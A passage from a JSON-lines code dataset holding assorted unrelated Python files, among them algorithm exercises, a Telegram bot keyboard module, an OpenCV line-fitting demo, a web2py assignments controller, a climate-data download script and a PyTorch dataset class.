print(f.read())\n#打开二进制文件\n#f=open('jiaren.png','rb')\n#print(f.read())\n#f.close()\n#write file\nwf=open('write_test.txt','w')\nwf.write('study is ...')\nwf.close()\n#with 写文件\nwith open('write_test1.txt','w') as wf:\n wf.write('all is well')\n","sub_path":"PythonFiles/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"538327259","text":"import sys\nsys.stdin = open('input.txt','r')\n\nN = int(input())\nP = int(input())\nnod = {}\nfor a in range(1,N+1):\n nod[a] = []\nfor _ in range(P):\n a, i = map(int,input().split())\n nod[a].append(i)\n nod[i].append(a)\n\n# print(nod)\n\ndef DFS():\n visit = [0]*(N+1)\n q, cur = [1], 1\n visit[1] = 1\n while q :\n if sum(visit) >= N :\n break\n for next in nod[cur]:\n if not visit[next]:\n visit[next] = 1\n q.append(cur)\n q.append(next)\n cur = next\n break\n cur = q.pop()\n # print(visit)\n # print(q)\n print(sum(visit)-1)\n\nDFS()","sub_path":"ForNovTest/BeakJoon/2606.py","file_name":"2606.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"371876072","text":"from datetime import datetime\n\nfrom aiogram import types\n\nimport consts\nimport bot_utils\n\n\ndef _callback(*args):\n return '-|-'.join([str(i) for i in args])\n\n\nbtn = {\n 'order': '📝Заказать песню',\n 'what_playing': '🎧Что играет?',\n 'help': '⁉️Помощь',\n 'feedback': '🖌Обратная связь',\n}\n\n\norder_inline = types.InlineKeyboardMarkup()\norder_inline.add(types.InlineKeyboardButton(\"Удобный поиск\", switch_inline_query_current_chat=\"\"))\n\nstart = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\nstart.add(types.KeyboardButton(btn['what_playing']), types.KeyboardButton(btn['order']))\nstart.add(types.KeyboardButton(btn['feedback']), types.KeyboardButton(btn['help']))\n\nwhat_playing = types.InlineKeyboardMarkup(row_width=2)\nwhat_playing.add(types.InlineKeyboardButton(text='История', url='https://t.me/rkpi_music'))\nwhat_playing.add(types.InlineKeyboardButton(text='Предыдущие треки', callback_data='song_prev'),\n types.InlineKeyboardButton(text='Следующие треки', callback_data='song_next'))\n\nchoice_help = types.InlineKeyboardMarkup(row_width=1)\nfor k, v in consts.helps['btns'].items():\n choice_help.add(types.InlineKeyboardButton(text=v, callback_data=_callback('help', k)))\n\n\nasync def choice_day() -> types.InlineKeyboardMarkup:\n day = datetime.today().weekday()\n bn = bot_utils.get_break_num()\n keyboard = types.InlineKeyboardMarkup(row_width=1)\n btns = []\n\n if bn is not False and (await bot_utils.order_time_left(day, bn)) != 0: # кнопка сейчас если эфир+успевает\n btns.append(types.InlineKeyboardButton(\n text=consts.times_name['next_days'][3],\n callback_data=_callback('order_time', day, bn)\n ))\n if datetime.now().hour < 22: # кнопка сегодня\n btns.append(types.InlineKeyboardButton(\n text=consts.times_name['next_days'][0],\n callback_data=_callback('order_day', day)\n ))\n for i in range(1, 3): # завтра (1), послезавтра (2)\n btns.append(types.InlineKeyboardButton(\n text=consts.times_name['next_days'][i],\n callback_data=_callback('order_day', (day + i) % 7)\n ))\n btns.append(types.InlineKeyboardButton(text='Отмена', callback_data='order_cancel'))\n keyboard.add(*btns)\n return keyboard\n\n\nasync def choice_time(day: int, attempts: int = 5) -> types.InlineKeyboardMarkup:\n\n async def get_btn(time_: int) -> types.InlineKeyboardButton:\n free_mins = await bot_utils.order_time_left(day, time_)\n if free_mins == 0 and attempts > 0:\n return types.InlineKeyboardButton(\n text='❌' + bot_utils.get_break_name(time_),\n callback_data=_callback('order_notime', day, attempts)\n )\n return types.InlineKeyboardButton(\n text=('⚠' if free_mins < 5 else '') + bot_utils.get_break_name(time_),\n callback_data=_callback('order_time', day, time_)\n )\n\n today = day == datetime.today().weekday()\n time = datetime.now().hour * 60 + datetime.now().minute\n times = consts.broadcast_times_[day]\n\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n btns = []\n\n for num, (_, break_finish) in times.items():\n if today and time > break_finish: # если сегодня и перерыв прошел - не добавляем кнопку\n continue\n btns.append(await get_btn(num))\n\n btns.append(types.InlineKeyboardButton(text='Назад', callback_data='order_back_day'))\n keyboard.add(*btns)\n return keyboard\n\n\ndef admin_choose(day: int, time: int) -> types.InlineKeyboardMarkup:\n return types.InlineKeyboardMarkup().add(\n types.InlineKeyboardButton(\n text='✅Принять',\n callback_data=_callback('admin_choice', day, time, 'queue')\n ),\n types.InlineKeyboardButton(\n text='Без очереди',\n callback_data=_callback('admin_choice', day, time, 'now')\n ),\n types.InlineKeyboardButton(\n text='❌Отклонить',\n callback_data=_callback('admin_choice', day, time, 'reject')\n )\n )\n\n\ndef admin_unchoose(day: int, time: int, status: str) -> types.InlineKeyboardMarkup:\n return types.InlineKeyboardMarkup().add(types.InlineKeyboardButton(\n text='Отмена',\n callback_data=_callback('admin_unchoice', day, time, status)\n ))\n","sub_path":"kpi_radio_bot/keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"166996341","text":"\n'''\nPython lesson: all()\nthe all() method returns True when all elements in the given iterable are true. If not, \nit returns False. \nDictionary: if alll the keys are true or dict is empty \n0 == False\n'0' == True\n\nany()\nthe any method returns True if there is any elements in the given iterable are true. \n\n'''\n\nclass Solution(object):\n def setZeroes(self, matrix):\n m = len(matrix)\n n = len(matrix[0])\n firstRowHasZero = not all(matrix[0])\n \n #Use first row/column as marker, scan the matrix \n for i in xrange(1,m):\n for j in xrange(n):\n if matrix[i][j] == 0:\n matrix[0][j] = matrix[i][0] = 0\n \n\n #Set the zeros\n for i in xrange(1, m):\n #start, stop, step\n for j in xrange(n-1, -1, -1):\n # first row or first column has been marked \n print(matrix[i][0])\n print(matrix[0][j])\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n #Set the zeros for the first row\n if firstRowHasZero:\n matrix[0] = [0] * n \n \n\n#test case\n[[0],[1]] \nx = Solution().setZeroes([[0],[1]])\nprint(x)\n\n\n\n\n","sub_path":"set_matrix_zeroes.py","file_name":"set_matrix_zeroes.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"567139069","text":"import numpy as np\nimport cv2\nfrom numpy.linalg import svd\n\n\nevents = [i for i in dir(cv2) if 'EVENT' in i]\nclick = False\nx1, y1 = -1, -1\n\n\ndef draw_rectangle(event, x, y, flags, param):\n global x1, y1, click, ptlst,dot_num,end # 전역변수 사용\n if event == cv2.EVENT_LBUTTONDOWN: # 마우스를 누른 상태\n click = True\n x1, y1 = x, y\n ptlst.append([x1,y1])\n if len(ptlst) == 5:\n n=5\n pts= np.array(ptlst)\n print(pts.shape)\n\n f = []\n y = []\n for i in range(5):\n f.append([\n np.array(pts[i, 0]),\n np.array(1)\n ])\n y.append([\n np.array(pts[i, 1])\n ])\n A=np.stack(f)\n Y = np.stack(y)\n F = np.linalg.pinv(A)\n\n [a, b] = (F @ Y)\n Start = [0, a[0] * 0 + b[0]]\n End = [1000, a[0] * 1000 + b[0]]\n a= a[0]\n b=b[0]\n cv2.line(img, (int(Start[0]), int(Start[1])), (int(End[0]), int(End[1])), (0, 255, 0))\n for i in range(n):\n cv2.line(img, (int(pts[ i, 0 ]), int(pts[i, 1 ])),(int(pts[ i, 0 ]), int(pts[i , 1])), (255, 255, 255), 5)\n for iter in range(15):\n print(iter)\n W = residual(pts[:, 0], pts[:, 1], a, b, n)\n X1 = np.linalg.pinv((A.T @ W @ A)) @ (A.T @ W @ Y)\n a = X1[0, 0]\n b = X1[1, 0]\n Start = [0, a * 0 + b]\n End = [1000, a * 1000 + b]\n if iter%3 == 0:\n cv2.line(img, (int(Start[0]), int(Start[1])), (int(End[0]), int(End[1])), (255, 0, 0))\n ptlst=[]\n end = True\n #cv2.putText(img, str(abs(volume)), (100,100),cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 1,(0,255,0), 2 )\n\ndef residual(X, Y, a, b, n):\n res =[]\n for i in range(n):\n res.append(Y[i] - (a*X[i]+b))\n R = np.stack(res)\n w=[]\n for i in range(n):\n w.append(1/ ((abs(R[i])/1.3998) +1))\n W = np.stack(w)\n return np.diag(W)\n\n\n\nimg = np.zeros((1000, 1000, 3), np.uint8)\nptlst =[]\ncv2.namedWindow('image')\ncv2.setMouseCallback('image', draw_rectangle)\n\nend =False\n\nwhile True:\n cv2.imshow('image', img) # 화면을 보여준다.\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\ncv2.destroyAllWindows()\n","sub_path":"HW11/hw_2.py","file_name":"hw_2.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"526933491","text":"@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin') or auth.has_membership('Student'))\ndef index():\n locations = db(db.C_Location).select()\n courses = db(db.Course).select()\n specializations = db(db.Specialization).select()\n batches = db(db.Batch).select()\n if auth.has_membership(3):\n student = db(db.Student.Student_appID == auth.user.id).select()\n batch_id = student[0].Batch\n student_query =db.Assignments.student_id == student[0].id\n batch_query = db.Assignments.Batch_id == batch_id\n assignments = db(student_query | batch_query ).select()\n submitals = db(db.Assignment_content.Student_ID == student[0].id).select()\n return locals()\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin'))\ndef batch_assignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n submitals = db(db.Assignment_content).select()\n Assignments = db(db.Assignments.Batch_id == request.vars.batch_id).select()\n students = db(db.Student.Batch == request.vars.batch_id).select()\n course = db(db.Batch.id == request.vars.batch_id).select(db.Batch.Batch_Course)[0].Batch_Course\n subjects = db(db.Subjects.Subject_Course == course).select()\n return locals()\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin'))\ndef add_BAassignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n course = db(db.Batch.id == batch_id).select(db.Batch.Batch_Course)[0].Batch_Course\n db.Assignments.insert( Assignemnt_title=request.vars.assign_title,\n Batch_id=batch_id,\n course=course,\n subject_assign=request.vars.assign_sub,\n FinalSubmission_date=request.vars.assign_date,\n Origianl_content=request.vars.assign_content)\n db.commit()\n db.activity_log.insert( Title_entry=\"Added Batch Assignment\", \n referance_id=auth.user.id,\n remarks=\"Batch Assignemnt added {}\".format(request.vars.assign_title))\n db.commit()\n redirect(URL('assignments','batch_assignments',vars=dict(batch_name=batch_name,batch_id=batch_id)))\n return locals()\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin')) \ndef add_STassignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n course = db(db.Batch.id == batch_id).select(db.Batch.Batch_Course)[0].Batch_Course\n db.Assignments.insert( Assignemnt_title=request.vars.assign_title,\n student_id=request.vars.student_id,\n course=course,\n subject_assign=request.vars.assign_sub,\n FinalSubmission_date=request.vars.assign_date,\n Origianl_content=request.vars.assign_content)\n db.commit()\n db.activity_log.insert( Title_entry=\"Added Student Assignment\", \n referance_id=auth.user.id,\n remarks=\"Student Assignemnt added {}\".format(request.vars.assign_title))\n db.commit()\n redirect(URL('assignments','batch_assignments',vars=dict(batch_name=batch_name,batch_id=batch_id)))\n return locals()\n\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin'))\ndef delete_assignments():\n batch_name = request.vars.batch_name\n batch_id = request.vars.batch_id\n db(db.Assignments.id == request.vars.assing_id).delete()\n db.commit()\n db.activity_log.insert( Title_entry=\"Deleted Batch Assignment\", \n referance_id=auth.user.id,\n remarks=\"Batch Assignemnt deleted {}, {}\".format(request.vars.assing_id,batch_id))\n db.commit()\n redirect(URL('assignments','batch_assignments',vars=dict(batch_name=batch_name,batch_id=batch_id)))\n return locals()\n\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin') or auth.has_membership('Student')) \ndef submit_assignments():\n student_id = db(db.Student.Student_appID == auth.user.id).select(db.Student.id)[0].id\n db.Assignment_content.insert(Assignemnt_title=request.vars.asignID,\n Student_ID=student_id,\n Assignment_file=request.vars.assign_content)\n db.commit()\n db.activity_log.insert( Title_entry=\"Submit Assignment\", \n referance_id=auth.user.id,\n remarks=\"Assignemnt Submitted {}\".format(request.vars.asignID))\n db.commit()\n redirect(URL('assignments','index'))\n return locals()\n\n\n@auth.requires(auth.has_membership('Examiner') or auth.has_membership('Admin') or auth.has_membership('Student')) \ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n if auth.has_membership(1):\n user = \"Admin\"\n elif auth.has_membership(2):\n user = \"Examiner\"\n elif auth.has_membership(3):\n user = \"student\"\n elif auth.has_membership(5):\n user = \"Managment\"\n\n db.activity_log.insert( Title_entry=\"Download assignment\", \n referance_id=auth.user.id,\n remarks=\"content downloaded by {}\".format(user))\n db.commit()\n return response.download(request, db)\n","sub_path":"controllers/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"174122385","text":"import sys\nimport glob\nimport random\n\nimport pygame.mixer\nimport serial\n\n#from sushi_parameter import SushiParameter\n\nBLUETOOTH = '/dev/ttyAMA0'\n#BLUETOOTH = '/dev/ttyS0'\nRATE = 9600\n\n\nif __name__ == '__main__':\n \n ser = serial.Serial(BLUETOOTH, RATE, timeout=2)\n drumroll_list = glob.glob(\"soundfile/roll/*.mp3\")\n complete_sound_list = glob.glob('soundfile/comp/*.mp3')\n\n while True:\n try:\n# ser.write(b'sent message\\n')\n\n# is_finished = False\n strmsg=\"\"\n strmsg=ser.readline().decode() #受け取ったメッセージをbyte->stringに直してstrmsgに代入してます\n if strmsg is \"\":\n print('get nothing')\n continue\n print('get',strmsg) #Oya機から受け取った値を出力します\n# received_values = list(strmsg.split(','))\n# sushi_parameter = SushiParameter(received_values[0],received_values[1],received_values[2],received_values[3])\n# \n# #くっついて縦振りしてると音楽を流す\n# if sushi_parameter.is_shake and sushi_parameter.is_stick:\n# drumroll_file = random.choice(drumroll_list)\n# play_music(drumroll_file)\n# is_finished = True\n# \n# #握っていて、距離が違いと鳴らす\n# if is_finished and sushi_parameter.dist > -43.0:\n# complete_file = random.choice(complete_sound_list)\n# if not pygame.mixer.music.get_busy():\n# play_music(complete_file)\n\n\n\n except KeyboardInterrupt:\n ser.close()\n sys.exit(0)\n\n\n\ndef play_music(self, filepath):\n if pygame.mixer.get_init() is None:\n pygame.mixer.init()\n \n pygame.mixer.music.load(filepath)\n pygame.mixer.music.play(1)\n\n","sub_path":"RaspberryPi/testPlay/test_serial.py","file_name":"test_serial.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545156105","text":"#!/usr/bin/env python\nimport cdsapi\nimport datetime\nimport numpy as np\nimport sys\nexecfile(\"date_str.py\")\nc = cdsapi.Client()\n\noutputdir = \"/gws/nopw/j04/ncas_climate_vol1/users/myoung02/datasets/era5/hourly/\"\n\ntime_ls = [\"00:00\",\"01:00\",\"02:00\",\"03:00\", \"04:00\", \"05:00\",\"06:00\", \"07:00\", \"08:00\",\"09:00\", \"10:00\", \"11:00\",\"12:00\", \"13:00\", \"14:00\",\"15:00\", \"16:00\", \"17:00\",\"18:00\", \"19:00\", \"20:00\",\"21:00\", \"22:00\", \"23:00\"]\n\ndef do_stuff(year,month,var_name):\n month_str = mon_string(month)\n nday = dayinmo(year,month)\n day_ls = []\n for d in np.arange(1,nday+1,1):\n day_ls.append(day_string(d))\n\n output_fname = outputdir+\"era5_hrly_\"+var_name+\"_\"+month_str+\"_\"+str(year)+\".nc\"\n c.retrieve(\"reanalysis-era5-single-levels\",\n {\"product_type\": \"reanalysis\",\n \"format\":\"netcdf\",\n \"variable\":var_name,\n \"area\":\"40/-30/-40/70\", # North, West, South, East. Default: global\n \"year\":year,\n \"month\":month_str,\n \"day\":day_ls,\n \"time\":time_ls},\n output_fname)\n\n return []\nif __name__ == \"__main__\":\n output = do_stuff(int(sys.argv[1]),int(sys.argv[2]),sys.argv[3])\n","sub_path":"get_era5_hourly.py","file_name":"get_era5_hourly.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"499680414","text":"def solve(cad):\n sz = len(cad)\n ret = sz\n for i in range(1, sz):\n for j in range(i, sz):\n if cad[j] == cad[j-i]:\n ret += 1\n else:\n break\n return ret\n\nassert 11 == solve('ababaa'), ' oops '\nassert 3 == solve('aa'), 'oops'\n#for _ in range(int(input())):\n# print(solve(input()))\n","sub_path":"HackerRank/Algorithms/Strings/stringSimilarity/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"353114421","text":"\"\"\"\n练习2 : 拷贝一个目录\n编写程序完成,将一个文件夹拷贝一份\n* 假设文件夹中只有普通文件\n* 将每个文件的拷贝作为一个拷贝事件\n* 使用进程池完成事件\n\n提示 : os.mkdir('name')\n\"\"\"\nfrom multiprocessing import Pool,Queue\nimport os,sys\n\nq = Queue() # 创建消息队列\n\n# 拷贝一个文件\ndef copy(file,old_folder,new_folder):\n fr = open(old_folder+'/'+file,'rb')\n fw = open(new_folder+'/'+file,'wb')\n while True:\n data = fr.read(1024)\n if not data:\n break\n n = fw.write(data) # 写入多少就是拷贝多少\n q.put(n) # 放入消息队列\n fr.close()\n fw.close()\n\n# 获取文件夹大小\ndef get_size(dir):\n total_size = 0\n for file in os.listdir(dir):\n total_size += os.path.getsize(dir+'/'+file)\n return total_size\n\n# 使用进程池\ndef main():\n old_folder = input(\"你要拷贝的目录:\")\n # 文件夹大小\n total_size = get_size(old_folder)\n new_folder = old_folder + \"-备份\"\n try:\n os.mkdir(new_folder)\n except:\n sys.exit(\"该目录已存在\")\n\n # 创建进程池\n pool = Pool()\n # 遍历目录,确定要拷贝的文件\n for file in os.listdir(old_folder):\n pool.apply_async(func=copy,args=(file,old_folder,new_folder))\n\n copy_size = 0\n while copy_size < total_size:\n copy_size += q.get() # 从消息队列获取数值累加\n print(\"拷贝了 %.2f%%\"%(copy_size/total_size*100))\n\n\n pool.close()\n pool.join()\n\nif __name__ == '__main__':\n main()","sub_path":"month_02/teacher/day13/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"556390616","text":"def swap(s, p, q):\n l = list(s)\n l[q], l[p] = l[p], l[q]\n return \"\".join(l)\n\n\ndef permute(s, l, r):\n if l == r:\n print([s])\n return\n\n i = l\n while i <= r:\n s = swap(s, l, i)\n permute(s, l + 1, r)\n s = swap(s, l, i)\n i += 1\n\n\ns = \"abc\"\npermute(s, 0, len(s) - 1)\n","sub_path":"cracking-the-code-interview/VII_technical-questions/technique2/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"395250271","text":"# -*- encoding: utf-8 -*-\nimport random\nimport numpy as np\nimport os\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nclass ImageDataset(Dataset):\n\tdef __init__(self, N_datasets, D_datasets, class_num, transforms_= None):\n\t\tself.N_datasets = N_datasets\n\t\tself.D_datasets = D_datasets\n\t\tself.class_num = class_num\n\t\tself.transform = transforms.Compose(transforms_)\n\t\tself.N_each_item_idx = [np.where(np.array(N_datasets.targets) == i)[0] for i in range(self.class_num)]\n\t\tself.len = 577\n\n\tdef __getitem__(self, index):\n\t\ttemp = index // self.len + 1\n\t\t##### 第一次遍历作为正样本既A的黑配A的白 #####\n\t\tif temp == 1:\n\t\t\tindex = index % self.len\n\t\t\titem_A = self.transform(Image.open(self.N_datasets.samples[index][0]))\n\t\t\titem_B = self.transform(Image.open(self.D_datasets.samples[index][0]))\n\t\t\tlabel = 1\n\t\t##### 第二次遍历作为负样本既A的黑配B的黑 #####\n\t\tif temp == 2:\n\t\t\tindex = index % self.len\n\t\t\trandom_num = random.randrange(1, self.class_num)\n\t\t\trandom_index = (self.N_datasets.targets[index] + random_num) % self.class_num\n\t\t\titemA_idx, itemB_idx = index, self.N_each_item_idx[random_index][index % len(self.N_each_item_idx[random_index])]\n\t\t\titem_A = self.transform(Image.open(self.N_datasets.samples[itemA_idx][0]))\n\t\t\titem_B = self.transform(Image.open(self.N_datasets.samples[itemB_idx][0]))\n\t\t\tlabel = 0\n\t\treturn item_A, item_B, label\n\n\tdef __len__(self):\n\t\treturn self.len*2","sub_path":"pytorch-siamese&GAN_day_night_resnet50_test/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"493575916","text":"from __future__ import print_function, division\nimport os, sys\nimport numpy as np\nfrom os.path import join\nfrom dataset import Config as DatasetConfig\nfrom dataset import Dataset\nimport pdb\nfrom scipy.spatial.distance import cdist\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\n\nclass Config(DatasetConfig):\n def __init__(self):\n super(Config, self).__init__()\n self.est_config = \"====== Intrinsic Dimension Estimation ======\"\n self.log_dir = \"exp/vanilla/log\"\n # self.num_threads = 10\n self.log_filename = \"est.log\"\n # self.logrs = \"-4:0:20\" # from -4 to 0 with 20 steps\n self.logrs = \"-10:10:100\" # from -10 to 10 with 100 steps\n\n\nclass Solver(object):\n def __init__(self, dataset, config):\n self.dataset = dataset\n self.log_dir = config.log_dir\n # self.logrs = config.logrs\n \n def compute_pairwise_l2distance(self):\n print('ues L2 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n # pdb.set_trace()\n R,C = np.triu_indices(num_samples,1) # Denote N = num_samples\n pair_innerdot = np.einsum('ij,ij->i', samples[R,:], samples[C,:]) \n # shape: (Nx(N-1)/2,) items are uptriangular part of mat [(Xi, Xj)], () denotes inner product\n norm = np.einsum('ij,ij->i', samples, samples) # shape: (N,)\n return norm[R] + norm[C] - 2*pair_innerdot \n \n def compute_pairwise_l1distance(self):\n print('ues L1 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n R, C = np.triu_indices(num_samples, 1) # Denote N = num_samples\n # R, C contain the row indexs and column indexs of upper-triangular part\n # shape: (Nx(N-1)/2,)\n l1norm = np.abs(samples[R, :] - samples[C, :]).sum(-1)\n\n return l1norm\n \n def optimized_pairwise_l1distance(self):\n print('ues L1 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n \"\"\"\n samples: matrix of size NxD\n Returns: NxN matrix D, with entry D_ij = manhattan or L1 distance between rows X_i and X_j\n \"\"\"\n D = cdist(samples, samples, metric='cityblock')\n iu1 = np.triu_indices(num_samples)\n D[iu1] = float('inf')\n # set the upper-triangular as Positive infinity\n return D\n \n def optimized_pairwise_l2distance(self):\n print('ues L2 norm to compute the distance')\n num_samples = len(self.dataset)\n samples = self.dataset.samples\n \"\"\"\n samples: matrix of size NxD\n Returns: NxN matrix D, with entry D_ij = squared euclidean distance between rows X_i and X_j\n \"\"\"\n # Math? See https://stackoverflow.com/questions/37009647\n sum_X = np.sum(np.square(samples), 1)\n D = np.add(np.add(-2 * np.dot(samples, samples.T), sum_X).T, sum_X)\n # **0.5 ?\n iu1 = np.triu_indices(num_samples)\n D[iu1] = float('inf')\n # set the upper-triangular as Positive infinity\n return D\n\n def optimized_compute_Cr(self, distances, r):\n num_samples = len(distances)\n print(np.sum(distances < r), num_samples)\n return np.sum(distances < r) / (0.5*num_samples*(num_samples-1))\n\n \n def compute_Cr(self, distances, r):\n return np.sum(distances < r) / len(distances)\n \n def show_curve(self, logrs, version=1):\n start, end, step = logrs.split(\":\")\n assert int(step) > 0\n logrs = np.linspace(float(start), float(end), num=int(step))\n rs = np.exp(logrs)\n print(rs)\n # distances = self.compute_pairwise_l1distance()\n \n # if version == 1:\n # distances = self.compute_pairwise_l1distance()\n # else:\n # distances = self.compute_pairwise_l2distance()\n \n if version == 1:\n distances = self.optimized_pairwise_l1distance()\n else:\n distances = self.optimized_pairwise_l2distance()\n print(distances)\n logCrs = []\n for r in rs:\n logCrs.append(self.optimized_compute_Cr(distances, r))\n # pdb.set_trace()\n # logCrs.append(self.compute_Cr(distances, r))\n logCrs = np.log(np.array(logCrs))\n logCrs_d = (logCrs - logCrs[[*range(1,len(logCrs)), -1]]) / (logrs[0] - logrs[1])\n logCrs_d = logCrs_d[~np.isnan(logCrs_d)]\n logCrs_d = logCrs_d[np.isfinite(logCrs_d)]\n # remove the nan and inf from logCrs_d\n print(\"candidate estiamted instrinsic dim: {}\".format(logCrs_d))\n\n\ndef main(config):\n dataset = Dataset(config)\n print(\">> creating solver\")\n solver = Solver(dataset, config)\n print(\">> solving\")\n solver.show_curve(config.logrs)\n print(\">> task finished\")\n\n\nif __name__ == '__main__':\n from utils import Logger\n config = Config()\n config.parse_args()\n if not os.path.exists(config.log_dir):\n os.makedirs(config.log_dir)\n sys.stdout = Logger('{0}/{1}'.format(config.log_dir, config.log_filename))\n config.print_args()\n main(config)\n\n","sub_path":"intrinsic_dimension/estimate_intrinsic_dim.py","file_name":"estimate_intrinsic_dim.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"114689920","text":"# Pretty print the database \n# currently unable to populate the db but this is how I think I would pprint\n\nfrom peewee import *\nfrom act7_personjob_model import Person, Job, Department\nfrom pprint import pprint\n\n\ndef pretty_print():\n # acccess the data base\n\n database = SqliteDatabase('act7_personjob.db')\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n\n # create query \n query = (Person.select(Person, Job, Department).join(Job, JOIN.INNER).join(Department, JOIN.INNER))\n\n # loop through the query and pprint \n for line in query:\n pprint(f'{item.person} had this job {line.job.job_name} in {line.job.department.department_name} department.')\n\n # close the database\n database.close()\n\npretty_print()","sub_path":"Student/AndyKwon/Lesson07/Activity07/act7_pretty_print.py","file_name":"act7_pretty_print.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11233677","text":"\"\"\"Sense the temperature.\"\"\"\n\nimport dht\nimport machine\n\n\ndef temperatureAndHumidity():\n \"\"\"Main program starts here.\"\"\"\n d = dht.DHT11(machine.Pin(16))\n d.measure()\n temp = d.temperature()\n humidity = d.humidity()\n return temp, humidity\n","sub_path":"MQTT/temperatureSensor.py","file_name":"temperatureSensor.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"379689088","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/10/21 20:40\n@Auth : Mr. William 1052949192\n@Company :特斯汀学院 @testingedu.com.cn\n@Function :选择排序\n\"\"\"\n\"\"\"\n全班学生身高\nheight = [166, 187, 156, 144, 155, 177, 167, 153, 188, 169]\n1.找出最高的学生身高\n2.从低到高排序\n\"\"\"\nheight = [166, 187, 156, 144, 155, 177, 167, 153, 188, 169]\n\nmaxh = height[0]\nfor i in range(1, len(height)):\n if height[i] > maxh:\n maxh = height[i]\n\nprint(maxh)\n\n\"\"\"\n每一次从待排序的数据元素中选出最小(或最大)的一个元素,\n存放在序列的起始位置或者结束为止,直到全部待排序的数据元素排完。\n\"\"\"\nheight = [166, 187, 156, 144, 155, 177, 167, 153, 188, 169]\n\n# 控制比较和交换的轮次\nfor j in range(0, len(height) - 1):\n # 记录最大的下标\n maxh = 0\n for i in range(1, len(height) - j):\n if height[i] > height[maxh]:\n # 记录大的下标\n maxh = i\n\n # 把最大的和最后一做对调\n height[maxh], height[len(height) - 1 - j] = \\\n height[len(height) - 1 - j], height[maxh]\n\nprint(height)\n\na = 1\nb = 2\na, b = b, a\nprint(a, b)\n","sub_path":"class04/example02.py","file_name":"example02.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"824051","text":"import pyservoce\nimport evalcache\nimport numpy\n\nimport zencad.settings\n\nclass ShapeView:\n\tdef __init__(self, sctrl):\n\t\tself.sctrl = sctrl\n\n\tdef set_location(self, trans):\n\t\tself.sctrl.set_location(trans)\n\n\tdef hide(self, en):\n\t\tself.sctrl.hide(en)\n\nclass unit:\n\t\"\"\"Базовый класс для использования в кинематических цепях и сборках\n\n\tВычисляет свою текущую позицию исходя из дерева построения.\n\tДержит список наследников, позиция которых считается относительно него. \n\t\"\"\"\n\n\tdef __init__(self, \n\t\t\t\tparent=None,\n\t\t\t\tshape=None,\n\t\t\t\tname=None, \n\t\t\t\tlocation=pyservoce.libservoce.nulltrans()): \n\t\tself.parent = parent\n\t\tself.shape = shape\n\t\tself.location = evalcache.unlazy_if_need(location)\n\t\tself.global_location = self.location\n\t\tself.name = name\n\t\tself.color = None\n\t\tself.dispobjects = []\n\t\tself.shapes_holder = []\n\n\t\tself.views = set()\n\t\tself.childs = set()\n\n\t\tif parent is not None:\n\t\t\tparent.add_child(self)\n\n\tdef add_child(self, 